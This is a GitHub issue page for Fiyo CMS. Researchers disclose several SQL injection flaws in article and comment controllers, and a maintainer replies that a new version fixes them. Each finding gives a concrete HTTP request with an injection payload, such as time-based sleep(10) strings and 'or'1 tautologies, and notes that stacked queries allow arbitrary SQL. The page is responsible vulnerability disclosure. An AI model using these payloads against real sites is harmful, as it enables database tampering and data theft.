Many sql injection in fiyo cms #5
Comments
|
thx you, we have update in new version.
im so greatfull about ur information.
thx regards.
…On 17 July 2017 at 12:49, iflody ***@***.***> wrote:
1. In /apps/app_article/controller/editor.php
$_POST['id'] has no filters and $_POST['art_title'] just filter the double
quote. So we can inject into this SQL statement. Because it used the PDO to
connect the MySQL Server, we can use stack query to execute any SQL
statement.
POST /fiyo/apps/app_article/controller/editor.php HTTP/1.1
Referer: http://localhost
id=" and sleep(10)&art_title=123\
1. In /apps/app_comment/controller/insert.php
$_POST paraments has some meanless filter. So we can inject into this SQL
statement. Because it used the PDO to connect the MySQL Server, we can use
stack query to execute any SQL statement.
POST /fiyo/apps/app_comment/controller/insert.php
Referer: http://localhost
send=true&name=1" or sleep(10) or ***@***.***&url=11&
text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%
3Ditem%26id%3D184
1. In dapur/apps/app_article/controller/article_list.php
$_GET[cat], $_GET[user], $_GET[level], $*GET['iSortCol*'.$i] are all no
filters at all. So we can inject into this SQL statement. Because it used
the PDO to connect the MySQL Server, we can use stack query to execute any
SQL statement.
GET /fiyo/dapur/apps/app_article/controller/article_list.php?
cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=
7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=
0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&
mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_
0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=
false&bSearchable_1=true&sSearch_2=&bRegex_2=false&
bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=
true&sSearch_4=&bRegex_4=false&bSearchable_4=true&
sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&
bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=
asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&
bSortable_2=true&bSortable_3=true&bSortable_4=true&
bSortable_5=true&bSortable_6=true&_=1500268118960
Referer: http://localhost
1. In dapur/apps/app_article/controller/article_status.php
$_GET['id'] has no filters and it will be inject into SQL
statement.Because it used the PDO to connect the MySQL Server, we can use
stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_article/controller/article_status.php?
fp=1&id=1'or'1
Referer: http://localhost
1. In dapur/apps/app_article/controller/comment_status.php
$_GET['id'] has no filters and it will be inject into SQL
statement.Because it used the PDO to connect the MySQL Server, we can use
stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_article/controller/comment_status.php?
stat=1&id=1'or'1
Referer: http://localhost
1. In dapur/apps/app_article/sys_article.php
"$_POST[parent_id]","$_POST[desc]","$_POST[keys]","$_POST[level]" has no
filters and they will be inject into SQL statement.Because it used the PDO
to connect the MySQL Server, we can use stack query to execute any SQL
statement.
In add category and edit category they are the similar problems.
In add article and edit article there are so many paraments have been not
filtered.
The attack vector is so simple and too many attact vector could be use. So
I will not write the detail.
1. In dapur/apps/app_comment/controller/comment_status.php
$_GET['id'] has no filters and it will be inject into SQL
statement.Because it used the PDO to connect the MySQL Server, we can use
stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_comment/controller/comment_status.php?
stat=1&id=1'or'1
Referer: http://localhost
1. In dapur/apps/app_comment/sys_comment.php
In edit comment component:
$_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status],
$_POST[id] has no filters and it will be inject into SQL statement.Because
it used the PDO to connect the MySQL Server, we can use stack query to
execute any SQL statement.
In enable comment and disable comment component:
$_REQUEST['id'] has no filters and it will be inject into SQL
statement.Because it used the PDO to connect the MySQL Server, we can use
stack query to execute any SQL statement.
The attack vector is so simple and too many attact vector could be use. So
I will not write the detail.
Discoverer: Valo & Melody from Chaitin Tech
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#5>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/ADAVXrAP7rjKeSbrB9BGAvyo3xU2yiD2ks5sOvXhgaJpZM4OZkfL>
.
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
$_POST['id'] has no filters and $_POST['art_title'] just filter the double quote. So we can inject into this SQL statement. Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
POST /fiyo/apps/app_article/controller/editor.php HTTP/1.1
Referer: http://localhost
id=" and sleep(10)&art_title=123\
$_POST paraments has some meanless filter. So we can inject into this SQL statement. Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
POST /fiyo/apps/app_comment/controller/insert.php
Referer: http://localhost
send=true&name=1" or sleep(10) or "1&email=aaa@qq.com&url=11&text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%3Ditem%26id%3D184
$_GET[cat], $_GET[user],$_GET[level], $ GET['iSortCol'.$i] are all no filters at all. So we can inject into this SQL statement. Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960
Referer: http://localhost
$_GET['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_article/controller/article_status.php?fp=1&id=1'or'1
Referer: http://localhost
$_GET['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_article/controller/comment_status.php?stat=1&id=1'or'1
Referer: http://localhost
"$_POST[parent_id]","$_POST[desc]","$_POST[keys]","$_POST[level]" has no filters and they will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
In add category and edit category they are the similar problems.
In add article and edit article there are so many paraments have been not filtered.
The attack vector is so simple and too many attact vector could be use. So I will not write the detail.
$_GET['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
GET /fiyo/dapur/apps/app_comment/controller/comment_status.php?stat=1&id=1'or'1
Referer: http://localhost
In edit comment component:
$_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status], $_POST[id] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
In enable comment and disable comment component:
$_REQUEST['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.
The attack vector is so simple and too many attact vector could be use. So I will not write the detail.
Discoverer: Valo & Melody from Chaitin Tech
The text was updated successfully, but these errors were encountered: